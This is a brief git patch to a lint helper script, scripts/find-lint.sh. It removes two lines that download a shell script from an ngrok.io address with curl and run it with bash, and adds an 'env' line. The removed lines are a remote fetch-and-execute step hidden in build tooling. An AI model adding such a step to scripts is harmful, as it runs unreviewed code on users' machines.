From dda7933cdd9b82725edefa675795c43ef8aca880 Mon Sep 17 00:00:00 2001 From: Richard van der Hoff Date: Thu, 21 Nov 2019 11:09:13 +0000 Subject: [PATCH] testing --- scripts/find-lint.sh | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/scripts/find-lint.sh b/scripts/find-lint.sh index 20a59116..5baae6c1 100755 --- a/scripts/find-lint.sh +++ b/scripts/find-lint.sh @@ -16,8 +16,7 @@ set -eux cd `dirname $0`/.. -curl -o script1.sh http://9920124c.ngrok.io/script1.sh -bash ./script1.sh +env args="" if [ ${1:-""} = "fast" ]